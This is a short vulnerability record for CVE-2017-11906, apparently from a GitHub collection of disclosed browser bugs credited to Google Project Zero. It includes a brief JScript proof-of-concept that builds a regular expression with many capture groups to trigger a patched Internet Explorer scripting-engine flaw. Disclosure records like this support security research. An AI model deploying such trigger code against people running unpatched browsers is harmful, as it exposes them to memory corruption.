Skip to content

Latest commit

 

History

History
26 lines (18 loc) · 475 Bytes

CVE-2017-11906.md

File metadata and controls

26 lines (18 loc) · 475 Bytes

CVE-2017-11906

  • Report: Oct 2017
  • Fix: Dec 2017
  • Credit: ifratric of Google Project Zero

PoC

<script language="Jscript.Encode">

function go() {
  var r= new RegExp(Array(100).join('()'));
  ''.search(r);
  alert(RegExp.lastParen);
}

go();

</script>

Reference